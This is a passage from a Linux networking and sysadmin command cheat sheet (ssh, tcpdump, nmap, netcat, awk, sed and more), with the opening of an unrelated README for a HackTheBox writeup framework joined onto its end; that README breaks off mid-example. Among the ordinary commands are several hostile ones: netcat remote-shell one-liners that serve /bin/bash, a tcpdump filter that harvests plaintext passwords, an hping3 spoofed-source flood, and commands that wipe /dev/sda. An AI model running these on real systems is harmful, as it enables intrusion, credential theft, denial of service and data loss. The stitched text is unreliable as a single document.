-noout -in ${_fd_csr} ) ``` ###### Check the private key and the certificate are match ```bash (openssl rsa -noout -modulus -in private.key | openssl md5 ; \ openssl x509 -noout -modulus -in certificate.crt | openssl md5) | uniq ``` ###### Check the private key and the CSR are match ```bash (openssl rsa -noout -modulus -in private.key | openssl md5 ; \ openssl req -noout -modulus -in request.csr | openssl md5) | uniq ``` ___ ##### Tool: [secure-delete](https://wiki.archlinux.org/index.php/Securely_wipe_disk) ###### Secure delete with shred ```bash shred -vfuz -n 10 file shred --verbose --random-source=/dev/urandom -n 1 /dev/sda ``` ###### Secure delete with scrub ```bash scrub -p dod /dev/sda scrub -p dod -r file ``` ###### Secure delete with badblocks ```bash badblocks -s -w -t random -v /dev/sda badblocks -c 10240 -s -w -t random -v /dev/sda ``` ###### Secure delete with secure-delete ```bash srm -vz /tmp/file sfill -vz /local sdmem -v swapoff /dev/sda5 && sswap -vz /dev/sda5 ``` ___ ##### Tool: [dd](https://en.wikipedia.org/wiki/Dd_(Unix)) ###### Show dd status every so often ```bash dd <dd_params> status=progress watch --interval 5 killall -USR1 dd ``` ###### Redirect output to a file with dd ```bash echo "string" | dd of=filename ``` ___ ##### Tool: [gpg](https://www.gnupg.org/) ###### Export public key ```bash gpg --export --armor "<username>" > username.pkey ``` * `--export` - export all keys from all keyrings or specific key * `-a|--armor` - create ASCII armored output ###### Encrypt file ```bash gpg -e -r "<username>" dump.sql ``` * `-e|--encrypt` - encrypt data * `-r|--recipient` - encrypt for specific <username> ###### Decrypt file ```bash gpg -o dump.sql -d dump.sql.gpg ``` * `-o|--output` - use as output file * `-d|--decrypt` - decrypt data (default) ###### Search recipient ```bash gpg --keyserver hkp://keyserver.ubuntu.com --search-keys "<username>" ``` * `--keyserver` - set specific key server * `--search-keys` - search for keys on a key server ###### List all of the packets in an encrypted file ```bash gpg --batch --list-packets archive.gpg gpg2 --batch --list-packets archive.gpg ``` ___ ##### Tool: [system-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-system-other) ###### Reboot system from init ```bash exec /sbin/init 6 ``` ###### Init system from single user mode ```bash exec /sbin/init ``` ###### Show current working directory of a process ```bash readlink -f /proc/<PID>/cwd ``` ###### Show actual pathname of the executed command ```bash readlink -f /proc/<PID>/exe ``` ##### Tool: [curl](https://curl.haxx.se) ```bash curl -Iks https://www.google.com ``` * `-I` - show response headers only * `-k` - insecure connection when using ssl * `-s` - silent mode (not display body) ```bash curl -Iks --location -X GET -A "x-agent" https://www.google.com ``` * `--location` - follow redirects * `-X` - set method * `-A` - set user-agent ```bash curl -Iks --location -X GET -A "x-agent" --proxy http://127.0.0.1:16379 https://www.google.com ``` * `--proxy [socks5://|http://]` - set proxy server ```bash curl -o file.pdf -C - https://example.com/Aiju2goo0Ja2.pdf ``` * `-o` - write output to file * `-C` - resume the transfer ###### Find your external IP address (external services) ```bash curl ipinfo.io curl ipinfo.io/ip curl icanhazip.com curl ifconfig.me/ip ; echo ``` ###### Repeat URL request ```bash # URL sequence substitution with a dummy query string: curl -ks https://example.com/?[1-20] # With shell 'for' loop: for i in {1..20} ; do curl -ks https://example.com/ ; done ``` ###### Check DNS and HTTP trace with headers for specific domains ```bash ### Set domains and external dns servers. _domain_list=(google.com) ; _dns_list=("8.8.8.8" "1.1.1.1") for _domain in "${_domain_list[@]}" ; do printf '=%.0s' {1..48} echo printf "[\\e[1;32m+\\e[m] resolve: %s\\n" "$_domain" for _dns in "${_dns_list[@]}" ; do # Resolve domain. host "${_domain}" "${_dns}" echo done for _proto in http https ; do printf "[\\e[1;32m+\\e[m] trace + headers: %s://%s\\n" "$_proto" "$_domain" # Get trace and http headers. curl -Iks -A "x-agent" --location "${_proto}://${_domain}" echo done done unset _domain_list _dns_list ``` ___ ##### Tool: [httpie](https://httpie.org/) ```bash http -p Hh https://www.google.com ``` * `-p` - print request and response headers * `H` - request headers * `B` - request body * `h` - response headers * `b` - response body ```bash http -p Hh https://www.google.com --follow --verify no ``` * `-F, --follow` - follow redirects * `--verify no` - skip SSL verification ```bash http -p Hh https://www.google.com --follow --verify no \ --proxy http:http://127.0.0.1:16379 ``` * `--proxy [http:]` - set proxy server ##### Tool: [ssh](https://www.openssh.com/) ###### Escape Sequence ``` # Supported escape sequences: ~. - terminate connection (and any multiplexed sessions) ~B - send a BREAK to the remote system ~C - open a command line ~R - Request rekey (SSH protocol 2 only) ~^Z - suspend ssh ~# - list forwarded connections ~& - background ssh (when waiting for connections to terminate) ~? - this message ~~ - send the escape character by typing it twice ``` ###### Compare a remote file with a local file ```bash ssh user@host cat /path/to/remotefile | diff /path/to/localfile - ``` ###### SSH connection through host in the middle ```bash ssh -t reachable_host ssh unreachable_host ``` ###### Run command over SSH on remote host ```bash cat > cmd.txt << __EOF__ cat /etc/hosts __EOF__ ssh host -l user $(<cmd.txt) ``` ###### Get public key from private key ```bash ssh-keygen -y -f ~/.ssh/id_rsa ``` ###### Get all fingerprints ```bash ssh-keygen -l -f .ssh/known_hosts ``` ###### SSH authentication with user password ```bash ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@remote_host ``` ###### SSH authentication with publickey ```bash ssh -o PreferredAuthentications=publickey -o PubkeyAuthentication=yes -i id_rsa user@remote_host ``` ###### Simple recording SSH session ```bash function _ssh_sesslog() { _sesdir="<path/to/session/logs>" mkdir -p "${_sesdir}" && \ ssh $@ 2>&1 | tee -a "${_sesdir}/$(date +%Y%m%d).log" } # Alias: alias ssh='_ssh_sesslog' ``` ###### Using Keychain for SSH logins ```bash ### Delete all of ssh-agent's keys. function _scl() { /usr/bin/keychain --clear } ### Add key to keychain. function _scg() { /usr/bin/keychain /path/to/private-key source "$HOME/.keychain/$HOSTNAME-sh" } ``` ###### SSH login without processing any login scripts ```bash ssh -tt user@host bash ``` ###### SSH local port forwarding Example 1: ```bash # Forwarding our local 2250 port to nmap.org:443 from localhost through localhost host1> ssh -L 2250:nmap.org:443 localhost # Connect to the service: host1> curl -Iks --location -X GET https://localhost:2250 ``` Example 2: ```bash # Forwarding our local 9051 port to db.d.x:5432 from localhost through node.d.y host1> ssh -nNT -L 9051:db.d.x:5432 node.d.y # Connect to the service: host1> psql -U db_user -d db_dev -p 9051 -h localhost ``` * `-n` - redirects stdin from `/dev/null` * `-N` - do not execute a remote command * `-T` - disable pseudo-terminal allocation ###### SSH remote port forwarding ```bash # Forwarding our local 9051 port to db.d.x:5432 from host2 through node.d.y host1> ssh -nNT -R 9051:db.d.x:5432 node.d.y # Connect to the service: host2> psql -U postgres -d postgres -p 8000 -h localhost ``` ___ ##### Tool: [linux-dev](https://www.tldp.org/LDP/abs/html/devref1.html) ###### Testing remote connection to port ```bash timeout 1 bash -c "</dev/<proto>/<host>/<port>" >/dev/null 2>&1 ; echo $? ``` * `<proto` - set protocol (tcp/udp) * `<host>` - set remote host * `<port>` - set destination port ###### Read and write to TCP or UDP sockets with common bash tools ```bash exec 5<>/dev/tcp/<host>/<port>; cat <&5 & cat >&5; exec 5>&- ``` ___ ##### Tool: [tcpdump](http://www.tcpdump.org/) ###### Filter incoming (on interface) traffic (specific <ip:port>) ```bash tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 ``` * `-n` - don't convert addresses (`-nn` will not resolve hostnames or ports) * `-e` - print the link-level headers * `-i [iface|any]` - set interface * `-Q|-D [in|out|inout]` - choose send/receive direction (`-D` - for old tcpdump versions) * `host [ip|hostname]` - set host, also `[host not]` * `[and|or]` - set logic * `port [1-65535]` - set port number, also `[port not]` ###### Filter incoming (on interface) traffic (specific <ip:port>) and write to a file ```bash tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 -c 5 -w tcpdump.pcap ``` * `-c [num]` - capture only num number of packets * `-w [filename]` - write packets to file, `-r [filename]` - reading from file ###### Capture all ICMP packets ```bash tcpdump -nei eth0 icmp ``` ###### Check protocol used (TCP or UDP) for service ```bash tcpdump -nei eth0 tcp port 22 -vv -X | egrep "TCP|UDP" ``` ###### Display ASCII text (to parse the output using grep or other) ```bash tcpdump -i eth0 -A -s0 port 443 ``` ###### Grab everything between two keywords ```bash tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p' ``` ###### Grab user and pass ever plain http ```bash tcpdump -i eth0 port http -l -A | egrep -i \ 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' \ --color=auto --line-buffered -B20 ``` ###### Extract HTTP User Agent from HTTP request header ```bash tcpdump -ei eth0 -nn -A -s1500 -l | grep "User-Agent:" ``` ###### Capture only HTTP GET and POST packets ```bash tcpdump -ei eth0 -s 0 -A -vv \ 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' or 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' ``` or simply: ```bash tcpdump -ei eth0 -s 0 -v -n -l | egrep -i "POST /|GET /|Host:" ``` ###### Rotate capture files ```bash tcpdump -ei eth0 -w /tmp/capture-%H.pcap -G 3600 -C 200 ``` * `-G <num>` - pcap will be created every `<num>` seconds * `-C <size>` - close the current pcap and open a new one if is larger than `<size>` ###### Top hosts by packets ```bash tcpdump -ei enp0s25 -nnn -t -c 200 | cut -f 1,2,3,4 -d '.' | sort | uniq -c | sort -nr | head -n 20 ``` ###### Excludes any RFC 1918 private address ```bash tcpdump -nei eth0 'not (src net (10 or 172.16/12 or 192.168/16) and dst net (10 or 172.16/12 or 192.168/16))' ``` ___ ##### Tool: [tcpick](http://tcpick.sourceforge.net/) ###### Analyse packets in real-time ```bash while true ; do tcpick -a -C -r dump.pcap ; sleep 2 ; clear ; done ``` ___ ##### Tool: [ngrep](http://ngrep.sourceforge.net/usage.html) ```bash ngrep -d eth0 "www.domain.com" port 443 ``` * `-d [iface|any]` - set interface * `[domain]` - set hostname * `port [1-65535]` - set port number ```bash ngrep -d eth0 "www.domain.com" src host 10.240.20.2 and port 443 ``` * `(host [ip|hostname])` - filter by ip or hostname * `(port [1-65535])` - filter by port number ```bash ngrep -d eth0 -qt -O ngrep.pcap "www.domain.com" port 443 ``` * `-q` - quiet mode (only payloads) * `-t` - added timestamps * `-O [filename]` - save output to file, `-I [filename]` - reading from file ```bash ngrep -d eth0 -qt 'HTTP' 'tcp' ``` * `HTTP` - show http headers * `tcp|udp` - set protocol * `[src|dst] host [ip|hostname]` - set direction for specific node ```bash ngrep -l -q -d eth0 -i "User-Agent: curl*" ``` * `-l` - stdout line buffered * `-i` - case-insensitive search ___ ##### Tool: [hping3](http://www.hping.org/) ```bash hping3 -V -p 80 -s 5050 <scan_type> www.google.com ``` * `-V|--verbose` - verbose mode * `-p|--destport` - set destination port * `-s|--baseport` - set source port * `<scan_type>` - set scan type * `-F|--fin` - set FIN flag, port open if no reply * `-S|--syn` - set SYN flag * `-P|--push` - set PUSH flag * `-A|--ack` - set ACK flag (use when ping is blocked, RST response back if the port is open) * `-U|--urg` - set URG flag * `-Y|--ymas` - set Y unused flag (0x80 - nullscan), port open if no reply * `-M 0 -UPF` - set TCP sequence number and scan type (URG+PUSH+FIN), port open if no reply ```bash hping3 -V -c 1 -1 -C 8 www.google.com ``` * `-c [num]` - packet count * `-1` - set ICMP mode * `-C|--icmptype [icmp-num]` - set icmp type (default icmp-echo = 8) ```bash hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source <remote_host> ``` * `--flood` - sent packets as fast as possible (don't show replies) * `--rand-source` - random source address mode * `-d --data` - data size * `-w|--win` - winsize (default 64) ___ ##### Tool: [nmap](https://nmap.org/) ###### Ping scans the network ```bash nmap -sP 192.168.0.0/24 ``` ###### Show only open ports ```bash nmap -F --open 192.168.0.0/24 ``` ###### Full TCP port scan using with service version detection ```bash nmap -p 1-65535 -sV -sS -T4 192.168.0.0/24 ``` ###### Nmap scan and pass output to Nikto ```bash nmap -p80,443 192.168.0.0/24 -oG - | nikto.pl -h - ``` ###### Recon specific ip:service with Nmap NSE scripts stack ```bash # Set variables: _hosts="192.168.250.10" _ports="80,443" # Set Nmap NSE scripts stack: _nmap_nse_scripts="+dns-brute,\ +http-auth-finder,\ +http-chrono,\ +http-cookie-flags,\ +http-cors,\ +http-cross-domain-policy,\ +http-csrf,\ +http-dombased-xss,\ +http-enum,\ +http-errors,\ +http-git,\ +http-grep,\ +http-internal-ip-disclosure,\ +http-jsonp-detection,\ +http-malware-host,\ +http-methods,\ +http-passwd,\ +http-phpself-xss,\ +http-php-version,\ +http-robots.txt,\ +http-sitemap-generator,\ +http-shellshock,\ +http-stored-xss,\ +http-title,\ +http-unsafe-output-escaping,\ +http-useragent-tester,\ +http-vhosts,\ +http-waf-detect,\ +http-waf-fingerprint,\ +http-xssed,\ +traceroute-geolocation.nse,\ +ssl-enum-ciphers,\ +whois-domain,\ +whois-ip" # Set Nmap NSE script params: _nmap_nse_scripts_args="dns-brute.domain=${_hosts},http-cross-domain-policy.domain-lookup=true," _nmap_nse_scripts_args+="http-waf-detect.aggro,http-waf-detect.detectBodyChanges," _nmap_nse_scripts_args+="http-waf-fingerprint.intensive=1" # Perform scan: nmap --script="$_nmap_nse_scripts" --script-args="$_nmap_nse_scripts_args" -p "$_ports" "$_hosts" ``` ___ ##### Tool: [netcat](http://netcat.sourceforge.net/) ```bash nc -kl 5000 ``` * `-l` - listen for an incoming connection * `-k` - listening after client has disconnected * `>filename.out` - save receive data to file (optional) ```bash nc 192.168.0.1 5051 < filename.in ``` * `< filename.in` - send data to remote host ```bash nc -vz 10.240.30.3 5000 ``` * `-v` - verbose output * `-z` - scan for listening daemons ```bash nc -vzu 10.240.30.3 1-65535 ``` * `-u` - scan only udp ports ###### Transfer data file (archive) ```bash server> nc -l 5000 | tar xzvfp - client> tar czvfp - /path/to/dir | nc 10.240.30.3 5000 ``` ###### Launch remote shell ```bash # 1) server> nc -l 5000 -e /bin/bash client> nc 10.240.30.3 5000 # 2) server> rm -f /tmp/f; mkfifo /tmp/f server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f client> nc 10.240.30.3 5000 ``` ###### Simple file server ```bash while true ; do nc -l 5000 | tar -xvf - ; done ``` ###### Simple minimal HTTP Server ```bash while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"' ; done ``` ###### Simple HTTP Server > Restarts web server after each request - remove `while` condition for only single connection. ```bash cat > index.html << __EOF__ <!doctype html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <p> Hello! It's a site. </p> </body> </html> __EOF__ ``` ```bash server> while : ; do \ (echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n" ; cat index.html;) | \ nc -l -p 5000 \ ; done ``` * `-p` - port number ###### Simple HTTP Proxy (single connection) ```bash #!/usr/bin/env bash if [[ $# != 2 ]] ; then printf "%s\\n" \ "usage: ./nc-proxy listen-port bk_host:bk_port" fi _listen_port="$1" _bk_host=$(echo "$2" | cut -d ":" -f1) _bk_port=$(echo "$2" | cut -d ":" -f2) printf " lport: %s\\nbk_host: %s\\nbk_port: %s\\n\\n" \ "$_listen_port" "$_bk_host" "$_bk_port" _tmp=$(mktemp -d) _back="$_tmp/pipe.back" _sent="$_tmp/pipe.sent" _recv="$_tmp/pipe.recv" trap 'rm -rf "$_tmp"' EXIT mkfifo -m 0600 "$_back" "$_sent" "$_recv" sed "s/^/=> /" <"$_sent" & sed "s/^/<= /" <"$_recv" & nc -l -p "$_listen_port" <"$_back" | \ tee "$_sent" | \ nc "$_bk_host" "$_bk_port" | \ tee "$_recv" >"$_back" ``` ```bash server> chmod +x nc-proxy && ./nc-proxy 8080 192.168.252.10:8000 lport: 8080 bk_host: 192.168.252.10 bk_port: 8000 client> http -p h 10.240.30.3:8080 HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: max-age=31536000 Content-Length: 2748 Content-Type: text/html; charset=utf-8 Date: Sun, 01 Jul 2018 20:12:08 GMT Last-Modified: Sun, 01 Apr 2018 21:53:37 GMT ``` ###### Create a single-use TCP or UDP proxy ```bash ### TCP -> TCP nc -l -p 2000 -c "nc [ip|hostname] 3000" ### TCP -> UDP nc -l -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> UDP nc -l -u -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> TCP nc -l -u -p 2000 -c "nc [ip|hostname] 3000" ``` ___ ##### Tool: [gnutls-cli](https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html) ###### Testing connection to remote host (with SNI support) ```bash gnutls-cli -p 443 google.com ``` ###### Testing connection to remote host (without SNI support) ```bash gnutls-cli --disable-sni -p 443 google.com ``` ___ ##### Tool: [socat](http://www.dest-unreach.org/socat/doc/socat.html) ###### Testing remote connection to port ```bash socat - TCP4:10.240.30.3:22 ``` * `-` - standard input (STDIO) * `TCP4:<params>` - set tcp4 connection with specific params * `[hostname|ip]` - set hostname/ip * `[1-65535]` - set port number ###### Redirecting TCP-traffic to a UNIX domain socket under Linux ```bash socat TCP-LISTEN:1234,bind=127.0.0.1,reuseaddr,fork,su=nobody,range=127.0.0.0/8 UNIX-CLIENT:/tmp/foo ``` * `TCP-LISTEN:<params>` - set tcp listen with specific params * `[1-65535]` - set port number * `bind=[hostname|ip]` - set bind hostname/ip * `reuseaddr` - allows other sockets to bind to an address * `fork` - keeps the parent process attempting to produce more connections * `su=nobody` - set user * `range=[ip-range]` - ip range * `UNIX-CLIENT:<params>` - communicates with the specified peer socket * `filename` - define socket ___ ##### Tool: [p0f](http://lcamtuf.coredump.cx/p0f3/) ###### Set iface in promiscuous mode and dump traffic to the log file ```bash p0f -i enp0s25 -p -d -o /dump/enp0s25.log ``` * `-i` - listen on the specified interface * `-p` - set interface in promiscuous mode * `-d` - fork into background * `-o` - output file ___ ##### Tool: [netstat](https://en.wikipedia.org/wiki/Netstat) ###### Graph # of connections for each hosts ```bash netstat -an | awk '/ESTABLISHED/ { split($5,ip,":"); if (ip[1] !~ /^$/) print ip[1] }' | \ sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1) ; for (i = 0; i < $1; i++) {printf("*")}; print "" }' ``` ###### Monitor open connections for specific port including listen, count and sort it per IP ```bash watch "netstat -plan | grep :443 | awk {'print \$5'} | cut -d: -f 1 | sort | uniq -c | sort -nk 1" ``` ###### Grab banners from local IPv4 listening ports ```bash netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}" ``` ___ ##### Tool: [rsync](https://en.wikipedia.org/wiki/Rsync) ###### Rsync remote data as root using sudo ```bash rsync --rsync-path 'sudo rsync' username@hostname:/path/to/dir/ /local/ ``` ___ ##### Tool: [host](https://en.wikipedia.org/wiki/Host_(Unix)) ###### Resolves the domain name (using external dns server) ```bash host google.com 9.9.9.9 ``` ###### Checks the domain administrator (SOA record) ```bash host -t soa google.com 9.9.9.9 ``` ___ ##### Tool: [dig](https://en.wikipedia.org/wiki/Dig_(command)) ###### Resolves the domain name (short output) ```bash dig google.com +short ``` ###### Lookup NS record for specific domain ```bash dig @9.9.9.9 google.com NS ``` ###### Query only answer section ```bash dig google.com +nocomments +noquestion +noauthority +noadditional +nostats ``` ###### Query ALL DNS Records ```bash dig google.com ANY +noall +answer ``` ###### DNS Reverse Look-up ```bash dig -x 172.217.16.14 +short ``` ___ ##### Tool: [certbot](https://certbot.eff.org/) ###### Generate multidomain certificate ```bash certbot certonly -d example.com -d www.example.com ``` ###### Generate wildcard certificate ```bash certbot certonly --manual --preferred-challenges=dns -d example.com -d *.example.com ``` ###### Generate certificate with 4096 bit private key ```bash certbot certonly -d example.com -d www.example.com --rsa-key-size 4096 ``` ___ ##### Tool: [network-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-network-other) ###### Get all subnets for specific AS (Autonomous system) ```bash AS="AS32934" whois -h whois.radb.net -- "-i origin ${AS}" | \ grep "^route:" | \ cut -d ":" -f2 | \ sed -e 's/^[ \t]//' | \ sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | \ cut -d ":" -f2 | \ sed -e 's/^[ \t]/allow /' | \ sed 's/$/;/' | \ sed 's/allow */subnet -> /g' ``` ###### Resolves domain name from dns.google.com with curl and jq ```bash _dname="google.com" ; curl -s "https://dns.google.com/resolve?name=${_dname}&type=A" | jq . ``` ##### Tool: [git](https://git-scm.com/) ###### Log alias for a decent view of your repo ```bash # 1) git log --oneline --decorate --graph --all # 2) git log --graph \ --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' \ --abbrev-commit ``` ___ ##### Tool: [python](https://www.python.org/) ###### Static HTTP web server ```bash # Python 3.x python3 -m http.server 8000 --bind 127.0.0.1 # Python 2.x python -m SimpleHTTPServer 8000 ``` ###### Static HTTP web server with SSL support ```bash # Python 3.x from http.server import HTTPServer, BaseHTTPRequestHandler import ssl httpd = HTTPServer(('localhost', 4443), BaseHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="path/to/key.pem", certfile='path/to/cert.pem', server_side=True) httpd.serve_forever() # Python 2.x import BaseHTTPServer, SimpleHTTPServer import ssl httpd = BaseHTTPServer.HTTPServer(('localhost', 4443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="path/tp/key.pem", certfile='path/to/cert.pem', server_side=True) httpd.serve_forever() ``` ###### Encode base64 ```bash python -m base64 -e <<< "sample string" ``` ###### Decode base64 ```bash python -m base64 -d <<< "dGhpcyBpcyBlbmNvZGVkCg==" ``` ##### Tool: [awk](http://www.grymoire.com/Unix/Awk.html) ###### Search for matching lines ```bash # egrep foo awk '/foo/' filename ``` ###### Search non matching lines ```bash # egrep -v foo awk '!/foo/' filename ``` ###### Print matching lines with numbers ```bash # egrep -n foo awk '/foo/{print FNR,$0}' filename ``` ###### Print the last column ```bash awk '{print $NF}' filename ``` ###### Find all the lines longer than 80 characters ```bash awk 'length($0)>80{print FNR,$0}' filename ``` ###### Print only lines of less than 80 characters ```bash awk 'length < 80 filename ``` ###### Print double new lines a file ```bash awk '1; { print "" }' filename ``` ###### Print line numbers ```bash awk '{ print FNR "\t" $0 }' filename awk '{ printf("%5d : %s\n", NR, $0) }' filename # in a fancy manner ``` ###### Print line numbers for only non-blank lines ```bash awk 'NF { $0=++a " :" $0 }; { print }' filename ``` ###### Print the line and the next two (i=5) lines after the line matching regexp ```bash awk '/foo/{i=5+1;}{if(i){i--; print;}}' filename ``` ###### Print the lines starting at the line matching 'server {' until the line matching '}' ```bash awk '/server {/,/}/' filename ``` ###### Print multiple columns with separators ```bash awk -F' ' '{print "ip:\t" $2 "\n port:\t" $3' filename ``` ###### Remove empty lines ```bash awk 'NF > 0' filename # alternative: awk NF filename ``` ###### Delete trailing white space (spaces, tabs) ```bash awk '{sub(/[ \t]*$/, "");print}' filename ``` ###### Delete leading white space ```bash awk '{sub(/^[ \t]+/, ""); print}' filename ``` ###### Remove duplicate consecutive lines ```bash # uniq awk 'a !~ $0{print}; {a=$0}' filename ``` ###### Remove duplicate entries in a file without sorting ```bash awk '!x[$0]++' filename ``` ###### Exclude multiple columns ```bash awk '{$1=$3=""}1' filename ``` ###### Substitute foo for bar on lines matching regexp ```bash awk '/regexp/{gsub(/foo/, "bar")};{print}' filename ``` ###### Add some characters at the beginning of matching lines ```bash awk '/regexp/{sub(/^/, "++++"); print;next;}{print}' filename ``` ###### Get the last hour of Apache logs ```bash awk '/'$(date -d "1 hours ago" "+%d\\/%b\\/%Y:%H:%M")'/,/'$(date "+%d\\/%b\\/%Y:%H:%M")'/ { print $0 }' \ /var/log/httpd/access_log ``` ___ ##### Tool: [sed](http://www.grymoire.com/Unix/Sed.html) ###### Print a specific line from a file ```bash sed -n 10p /path/to/file ``` ###### Remove a specific line from a file ```bash sed -i 10d /path/to/file # alternative (BSD): sed -i'' 10d /path/to/file ``` ###### Remove a range of lines from a file ```bash sed -i <file> -re '<start>,<end>d' ``` ###### Replace newline(s) with a space ```bash sed ':a;N;$!ba;s/\n/ /g' /path/to/file # cross-platform compatible syntax: sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' /path/to/file ``` - `:a` create a label `a` - `N` append the next line to the pattern space - `$!` if not the last line, ba branch (go to) label `a` - `s` substitute, `/\n/` regex for new line, `/ /` by a space, `/g` global match (as many times as it can) Alternatives: ```bash # perl version (sed-like speed): perl -p -e 's/\n/ /' /path/to/file # bash version (slow): while read line ; do printf "%s" "$line " ; done < file ``` ###### Delete string +N next lines ```bash sed '/start/,+4d' /path/to/file ``` ___ ##### Tool: [grep](http://www.grymoire.com/Unix/Grep.html) ###### Search for a "pattern" inside all files in the current directory ```bash grep -rn "pattern" grep -RnisI "pattern" * fgrep "pattern" * -R ``` ###### Show only for multiple patterns ```bash grep 'INFO*'\''WARN' filename grep 'INFO\|WARN' filename grep -e INFO -e WARN filename grep -E '(INFO|WARN)' filename egrep "INFO|WARN" filename ``` ###### Except multiple patterns ```bash grep -vE '(error|critical|warning)' filename ``` ###### Show data from file without comments ```bash grep -v ^[[:space:]]*# filename ``` ###### Show data from file without comments and new lines ```bash egrep -v '#|^$' filename ``` ###### Show strings with a dash/hyphen ```bash grep -e -- filename grep -- -- filename grep "\-\-" filename ``` ###### Remove blank lines from a file and save output to new file ```bash grep . filename > newfilename ``` ##### Tool: [perl](https://www.perl.org/) ###### Search and replace (in place) ```bash perl -i -pe's/SEARCH/REPLACE/' filename ``` ###### Edit of `*.conf` files changing all foo to bar (and backup original) ```bash perl -p -i.orig -e 's/\bfoo\b/bar/g' *.conf ``` ###### Prints the first 20 lines from `*.conf` files ```bash perl -pe 'exit if $. > 20' *.conf ``` ###### Search lines 10 to 20 ```bash perl -ne 'print if 10 .. 20' filename ``` ###### Delete first 10 lines (and backup original) ```bash perl -i.orig -ne 'print unless 1 .. 10' filename ``` ###### Delete all but lines between foo and bar (and backup original) ```bash perl -i.orig -ne 'print unless /^foo$/ .. /^bar$/' filename ``` ###### Reduce multiple blank lines to a single line ```bash perl -p -i -00pe0 filename ``` ###### Convert tabs to spaces (1t = 2sp) ```bash perl -p -i -e 's/\t/ /g' filename ``` ###### Read input from a file and report number of lines and characters ```bash perl -lne '$i++; $in += length($_); END { print "$i lines, $in characters"; }' filename ``` #### Shell functions &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### Table of Contents - [Domain resolve](#domain-resolve) - [Get ASN](#get-asn) ###### Domain resolve ```bash # Dependencies: # - curl # - jq function DomainResolve() { local _host="$1" local _curl_base="curl --request GET" local _timeout="15" _host_ip=$($_curl_base -ks -m "$_timeout" "https://dns.google.com/resolve?name=${_host}&type=A" | \ jq '.Answer[0].data' | tr -d "\"" 2>/dev/null) if [[ -z "$_host_ip" ]] || [[ "$_host_ip" == "null" ]] ; then echo -en "Unsuccessful domain name resolution.\\n" else echo -en "$_host > $_host_ip\\n" fi } ``` Example: ```bash shell> DomainResolve nmap.org nmap.org > 45.33.49.119 shell> DomainResolve nmap.org Unsuccessful domain name resolution. ``` ###### Get ASN ```bash # Dependencies: # - curl function GetASN() { local _ip="$1" local _curl_base="curl --request GET" local _timeout="15" _asn=$($_curl_base -ks -m "$_timeout" "http://ip-api.com/line/${_ip}?fields=as") _state=$(echo $?) if [[ -z "$_ip" ]] || [[ "$_ip" == "null" ]] || [[ "$_state" -ne 0 ]]; then echo -en "Unsuccessful ASN gathering.\\n" else echo -en "$_ip > $_asn\\n" fi } ``` Example: ```bash shell> GetASN 1.1.1.1 1.1.1.1 > AS13335 Cloudflare, Inc. shell> GetASN 0.0.0.0 Unsuccessful ASN gathering. ```
# svachal [![License: CC BY-SA 4.0](https://raw.githubusercontent.com/7h3rAm/7h3rAm.github.io/master/static/files/ccbysa4.svg)](https://creativecommons.org/licenses/by-sa/4.0/) This is an automation framework for machine writeups. It defines a YAML based writeup template that can be used while working on a machine. Once the writeup is complete, the YAML writeup file can be used to render a `.md` and `.pdf` report along with stats and summary for all completed writeups. It works in conjunction with [machinescli](https://github.com/7h3rAm/machinescli) project, so all machine metadata is natively accessible: ## Installation You will need to configure [`machinescli`](https://github.com/7h3rAm/machinescli) before using `svachal`. Follow [installation](https://github.com/7h3rAm/machinescli#installation) guide to create the shared `machines.json` file using `machinescli`: Next, clone `svachal` repository and install requirements: ``` $ cd $HOME/toolbox/projects $ git clone https://github.com/7h3rAm/svachal && cd svachal $ python3 -m venv --copies venv $ source venv/bin/activate $ pip install -r requirements.txt $ python3 svachal.py -h ``` `svachal` expects GitHub to be the primary portal for writeups storage and sharing. As such, it needs a repo URL for links within writeup `yml`/`md`/`pdf` files to correctly point to right resources. Initialize `svachal` for first run by creating a writeups directory and run with `-w` and `-g` arguments: ``` $ mkdir -pv $HOME/toolbox/projects/writeups && cd $HOME/toolbox/projects/writeups $ git init $ git add . $ git commit -m 'Initial commit' $ git remote add github http://github.com/<USERNAME>/writeups $ git push github master $ python3 $HOME/toolbox/projects/svachal.py -w $HOME/toolbox/projects/writeups -g http://github.com/<USERNAME>/writeups -s "https://app.hackthebox.eu/machines/200" writeup: metadata: status: private datetime: 20220101 infra: HackTheBox name: Rope points: 50 path: htb.rope url: https://app.hackthebox.eu/machines/200 infocard: ./infocard.png references: - categories: - linux - hackthebox tags: - enumerate_ - exploit_ - privesc_ overview: description: | This is a writeup for HackTheBox VM [`Rope`](https://app.hackthebox.eu/machines/200). Here's an overview of the `enumeration` → `exploitation` → `privilege escalation` process: [+] writeup file 